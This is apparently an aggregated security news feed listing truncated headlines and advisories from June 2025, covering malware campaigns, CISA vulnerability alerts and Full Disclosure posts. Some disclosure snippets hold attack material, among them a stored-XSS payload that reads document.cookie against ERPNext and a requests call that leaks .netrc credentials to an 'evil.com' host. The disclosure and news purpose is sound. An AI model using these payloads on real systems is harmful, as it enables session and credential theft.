Attack Feeds
What comes to your mind when you think of Photoshop? A tool for editing and retouching photos –… – Read More – Hackread – Latest Cybersecurity, Hacking News, Tech, AI & Crypto
Privacy/Governance Feed
Experts argue the case for “communities of support” to boost SMB cyber-resilience – Read More –
Privacy/Governance Feed
Experts argue that CISOs should avoid product duplication and simplify their language to ensure budget is spent wisely – Read More –
Attack Feeds
Threat hunters are calling attention to a new variant of a remote access trojan (RAT) called Chaos RAT that has been used in recent attacks targeting Windows and Linux systems. According to findings from Acronis, the malware artifact may have been distributed by tricking victims into downloading a network troubleshooting utility for Linux environments. “Chaos … Read More “Chaos RAT Malware Targets Windows and Linux via Fake Network Tool Downloads – The Hacker News” »
Privacy/Governance Feed
Agentic AI systems could threaten security and data privacy, unless organizations test each model and component – Read More –
Privacy/Governance Feed
The attacks on UK retailers are “a wake-up call” for the industry, said River Island’s Information Security Officer – Read More –
Privacy/Governance Feed
A phishing campaign spoofing Booking.com has been observed targeting hospitality sector, using ClickFix to install malware – Read More –
Attack Feeds
Traditional data leakage prevention (DLP) tools aren’t keeping pace with the realities of how modern businesses use SaaS applications. Companies today rely heavily on SaaS platforms like Google Workspace, Salesforce, Slack, and generative AI tools, significantly altering the way sensitive information is handled. In these environments, data rarely appears as traditional files or crosses networks … Read More “Your SaaS Data Isn’t Safe: Why Traditional DLP Solutions Fail in the Browser Era – The Hacker News” »
Privacy/Governance Feed
Sophos has uncovered a scheme planting malicious code in 130+ GitHub repositories, targeting hackers and gamers – Read More –
Attack Feeds
Today, your internet presence is much more than just a website or social media profile, it’s like your… – Read More – Hackread – Latest Cybersecurity, Hacking News, Tech, AI & Crypto
Privacy/Governance Feed
Stolen devices are a bigger cause of data loss than stolen credentials or ransomware, according to a new Blancco study – Read More –
Attack Feeds
Several malicious packages have been uncovered across the npm, Python, and Ruby package repositories that drain funds from cryptocurrency wallets, erase entire codebases after installation, and exfiltrate Telegram API tokens, once again demonstrating the variety of supply chain threats lurking in open-source ecosystems. The findings come from multiple reports published by Checkmarx, – Read More … Read More “Malicious PyPI, npm, and Ruby Packages Exposed in Ongoing Open-Source Supply Chain Attacks – The Hacker News” »
Alert Feeds
Posted by Sanjay Singh on Jun 03 Hello Full Disclosure list, I am sharing details of a newly assigned CVE affecting an open-source educational software project: ———————————————————————— CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP Project v1.0 ———————————————————————— Product: CloudClassroom PHP Project Vendor:… – Read More – Full Disclosure
Alert Feeds
Posted by Sanjay Singh on Jun 03 Hello Full Disclosure list, I am sharing details of a newly assigned CVE affecting an open-source educational software project: ———————————————————————— CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP Project v1.0 ———————————————————————— Product: CloudClassroom PHP Project Vendor:… – Read More – Full Disclosure
Attack Feeds
Shift in cyberattack focus puts APAC region under growing pressure. – Read More – Hackread – Latest Cybersecurity, Hacking News, Tech, AI & Crypto
Privacy/Governance Feed
Startups at Infosecurity Europe focus on attack surface management and improving security data, even as some new vendors avoid AI-led marketing – Read More –
Privacy/Governance Feed
Rapid7 found that 56% of all compromises in Q1 2025 resulted from the theft of valid account credentials with no MFA in place – Read More –
Gov/ISAC Feeds
Calling cyber security professionals, culture specialists and leaders to drive uptake of new Cyber security culture principles. – Read More – NCSC Feed
Attack Feeds
Hewlett Packard Enterprise (HPE) has released security updates to address as many as eight vulnerabilities in its StoreOnce data backup and deduplication solution that could result in an authentication bypass and remote code execution. “These vulnerabilities could be remotely exploited to allow remote code execution, disclosure of information, server-side request forgery, authentication bypass, – Read … Read More “HPE Issues Security Patch for StoreOnce Bug Allowing Remote Authentication Bypass – The Hacker News” »
Attack Feeds
A new study by NordPass and NordStellar reveals the automotive industry is plagued by weak, reused, and common… – Read More – Hackread – Latest Cybersecurity, Hacking News, Tech, AI & Crypto
Gov/ISAC Feeds
Multiple vulnerabilities have been discovered in Google Chrome, the most severe of which could allow for arbitrary code execution. Google Chrome is a web browser used to access the internet. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution in the context of the logged-on user. Depending on the privileges associated with the … Read More “Multiple Vulnerabilities in Google Chrome Could Allow for Arbitrary Code Execution – Cyber Security Advisories – MS-ISAC” »
Attack Feeds
Google’s June security update for Android devices contains 34 vulnerabilities, all of which the company designates as high-severity defects. The company didn’t disclose any actively exploited vulnerabilities. Attackers could exploit the most serious flaw — CVE-2025-26443 affecting the Android system — to achieve local escalation of privilege with no additional privileges required. Google said exploitation … Read More “Google addresses 34 high-severity vulnerabilities in June’s Android security update – CyberScoop” »
Gov/ISAC Feeds
CISA has added three new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation. CVE-2025-21479 Qualcomm Multiple Chipsets Incorrect Authorization Vulnerability CVE-2025-21480 Qualcomm Multiple Chipsets Incorrect Authorization Vulnerability CVE-2025-27038 Qualcomm Multiple Chipsets Use-After-Free Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to … Read More “CISA Adds Three Known Exploited Vulnerabilities to Catalog – All CISA Advisories” »
Attack Feeds
Modern software development demands rapid delivery of high-quality applications that can adapt to changing business requirements and user… – Read More – Hackread – Latest Cybersecurity, Hacking News, Tech, AI & Crypto
Attack Feeds
Compliance automation provider Vanta confirms a software bug exposed private customer data to other users, impacting hundreds of… – Read More – Hackread – Latest Cybersecurity, Hacking News, Tech, AI & Crypto
Gov/ISAC Feeds
Post Content – Read More – IC3.gov News
Gov/ISAC Feeds
View CSAF 1. EXECUTIVE SUMMARY CVSS v4 9.3 ATTENTION: Exploitable remotely/low attack complexity Vendor: Schneider Electric Equipment: Wiser AvatarOn 6K Freelocate, Wiser Cuadro H 5P Socket Vulnerability: Buffer Copy without Checking Size of Input (‘Classic Buffer Overflow’) 2. RISK EVALUATION Successful exploitation of this vulnerability could allow an attacker to inject code or bypass authentication. … Read More “Schneider Electric Wiser Home Automation – All CISA Advisories” »
Gov/ISAC Feeds
View CSAF 1. EXECUTIVE SUMMARY CVSS v4 4.6 ATTENTION: Low attack complexity Vendor: Schneider Electric Equipment: EcoStruxure Power Build Rapsody Vulnerability: Stack-based Buffer Overflow 2. RISK EVALUATION Successful exploitation of this vulnerability could allow an attacker to achieve arbitrary code execution on the affected device. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following Schneider Electric … Read More “Schneider Electric EcoStruxure Power Build Rapsody – All CISA Advisories” »
Gov/ISAC Feeds
CISA released three Industrial Control Systems (ICS) advisories on June 3, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS. ICSA-25-153-01 Schneider Electric Wiser Home Automation ICSA-25-153-02 Schneider Electric EcoStruxure Power Build Rapsody ICSA-25-153-03 Mitsubishi Electric MELSEC iQ-F Series CISA encourages users and administrators to review newly released ICS … Read More “CISA Releases Three Industrial Control Systems Advisories – All CISA Advisories” »
Gov/ISAC Feeds
View CSAF 1. EXECUTIVE SUMMARY CVSS v3 9.1 ATTENTION: Exploitable remotely/low attack complexity Vendor: Mitsubishi Electric Equipment: MELSEC iQ-F Series Vulnerability: Improper Validation of Specified Index, Position, or Offset in Input 2. RISK EVALUATION Successful exploitation of this vulnerability could allow an attacker to read confidential information, cause a denial-of-service condition, or stop operations by … Read More “Mitsubishi Electric MELSEC iQ-F Series – All CISA Advisories” »
Attack Feeds
North Face, Cartier, and Next Step Healthcare are the latest victims in a string of cyberattacks compromising customer… – Read More – Hackread – Latest Cybersecurity, Hacking News, Tech, AI & Crypto
Attack Feeds
CrowdStrike and Microsoft announced an agreement Monday to formally connect the different names each company uses for the same threat groups in their attribution analysis. The companies said the effort will clarify inconsistencies across the industry’s naming taxonomies and acknowledge when both companies identify the same threat groups. The alliance between the longstanding competitors doesn’t … Read More “CrowdStrike, Microsoft aim to eliminate confusion in threat group attribution – CyberScoop” »
Attack Feeds
President Donald Trump’s pick to serve as national cyber director was endorsed by a collection of cyber experts days before a Senate panel will consider his nomination. The 24 people who signed the letter endorsing Sean Cairncross include former government officials and current industry leaders, many who served in Republican-led administrations but some who also served … Read More “Experts endorse Sean Cairncross for national cyber director ahead of Senate hearing – CyberScoop” »
Attack Feeds
Threat hunters are alerting to a new campaign that employs deceptive websites to trick unsuspecting users into executing malicious PowerShell scripts on their machines and infect them with the NetSupport RAT malware. The DomainTools Investigations (DTI) team said it identified “malicious multi-stage downloader Powershell scripts” hosted on lure websites that masquerade as Gitcode and DocuSign. … Read More “Fake DocuSign, Gitcode Sites Spread NetSupport RAT via Multi-Stage PowerShell Attack – The Hacker News” »
Privacy/Governance Feed
Resellers and channel partners can add value, fill gaps in security teams and offer expertise in niche markets – Read More –
Privacy/Governance Feed
Effective cybersecurity played a key role Ukraine drone attack on Russian strategic bombers, a leading government security expert has claimed – Read More –
Alert Feeds
Posted by Stefan Kanthak on Jun 03 Hi @ll, user group policies are stored in DACL-protected registry keys [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPolicies] respectively [HKEY_CURRENT_USERSoftwarePolicies] and below, where only the SYSTEM account and members of the “Administrators” user group are granted write access. At logon the user’s registry hive “%USERPROFILE%ntuser.dat” is loaded with exclusive (read, write and… – Read … Read More “Defense in depth — the Microsoft way (part 89): user group policies don’t deserve tamper protection – Full Disclosure” »
Attack Feeds
Cybersecurity researchers have disclosed details of a critical security flaw in the Roundcube webmail software that has gone unnoticed for a decade and could be exploited to take over susceptible systems and execute arbitrary code. The vulnerability, tracked as CVE-2025-49113, carries a CVSS score of 9.9 out of 10.0. It has been described as a … Read More “Critical 10-Year-Old Roundcube Webmail Bug Allows Authenticated Users Run Malicious Code – The Hacker News” »
Attack Feeds
Silver Spring, Maryland, 3rd June 2025, CyberNewsWire – Read More – Hackread – Latest Cybersecurity, Hacking News, Tech, AI & Crypto
Alert Feeds
Posted by Ron E on Jun 03 An authenticated user can inject malicious JavaScript into the user_image field of the profile page using an XSS payload within the file path or HTML context. This field is rendered without sufficient sanitization, allowing stored script execution in the context of other authenticated users. *Proof of Concept:*POST … Read More “ERPNext v15.53.1 Stored XSS in user_image Field Allows Script Execution via Injected Image Path – Full Disclosure” »
Alert Feeds
Posted by Ron E on Jun 03 An authenticated attacker can inject JavaScript into the bio field of their user profile. When the profile is viewed by another user, the injected script executes. *Proof of Concept:* POST /api/method/frappe.desk.page.user_profile.user_profile.update_profile_info HTTP/2 Host: –host– profile_info=”bio”:””><img src=x onerror=alert(document.cookie)>” – Read More – Full Disclosure
Alert Feeds
Posted by Andrey Stoykov on Jun 03 # Exploit Title: IDOR “Change Password” Functionality – adaptcmsv3.0.3 # Date: 06/2025 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ IDOR “Change Password” Functionality #1: Steps to Reproduce: 1. Login as user with low privilege and visit profile page … Read More “IDOR “Change Password” Functionality – adaptcmsv3.0.3 – Full Disclosure” »
Alert Feeds
Posted by Andrey Stoykov on Jun 03 # Exploit Title: Stored XSS via File Upload – adaptcmsv3.0.3 # Date: 06/2025 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS via File Upload #1: Steps to Reproduce: 1. Login with low privilege user and visit “Profile” … Read More “Stored XSS via File Upload – adaptcmsv3.0.3 – Full Disclosure” »
Alert Feeds
Posted by Qualys Security Advisory via Fulldisclosure on Jun 03 Qualys Security Advisory Local information disclosure in apport and systemd-coredump (CVE-2025-5054 and CVE-2025-4598) ======================================================================== Contents ======================================================================== Summary Mitigation Local information disclosure in apport (CVE-2025-5054) – Background – Analysis – Proof of concept Local information disclosure in systemd-coredump… – Read More – Full Disclosure
Privacy/Governance Feed
CISA is facing $495m budget cut, losing 1000 employees and reducing staff to 2324 – Read More –
Alert Feeds
Posted by Jacek Lipkowski via Fulldisclosure on Jun 03 Hi, I made a novel honeypot for worms called Youpot. Normally a honeypot will try to implement whatever service it thinks the attacker would like. For a high interaction or pure honeypot this is often impossible, because of the thousands of possibilities. Even a simple … Read More “Youpot honeypot – Full Disclosure” »
Alert Feeds
Posted by Housma mardini on Jun 03 Hi, I am submitting an exploit for *CVE-2019-9978*, a remote code execution vulnerability in the Social Warfare WordPress plugin (version <= 3.5.2). *Exploit Title*: CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2) *Date*: 2025-05-20 *Exploit Author*: Huseyin Mardinli *Vendor Homepage*: https://warfareplugins.com/ *Software Link*: https://wordpress.org/plugins/social-warfare/ … Read More “Exploit CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2) – Full Disclosure” »
Alert Feeds
Posted by Juho Forsén via Fulldisclosure on Jun 03 The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc credentials to third parties due to incorrect URL processing under specific conditions. Issuing the following API call triggers the vulnerability: requests.get(‘http://example.com:@evil.com/&apos😉 Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call. … Read More “CVE-2024-47081: Netrc credential leak in PSF requests library – Full Disclosure” »
Alert Feeds
Posted by Michał Majchrowicz via Fulldisclosure on Jun 03 Security Advisory Vulnerabilities reported to vendor: March 13, 2025 Vendor requested additional information: March 20, 2025 Additional information provided to vendor: March 22, 2025 Vendor confirmed the reported issues but rejected them: March 31, 2025 Additional information provided to vendor: May 6, 2025 Vendor confirmed … Read More “Multiple Vulnerabilities in SAP GuiXT Scripting – Full Disclosure” »
Alert Feeds
Posted by Andrey Stoykov on Jun 03 # Exploit Title: Stored XSS in “Description” Functionality – cubecartv6.5.9 # Date: 05/2025 # Exploit Author: Andrey Stoykov # Version: 6.5.9 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS #1: Steps to Reproduce: 1. Visit “Account” > “Address Book” and choose “Edit” 2. In the … Read More “Stored XSS in “Description” Functionality – cubecartv6.5.9 – Full Disclosure” »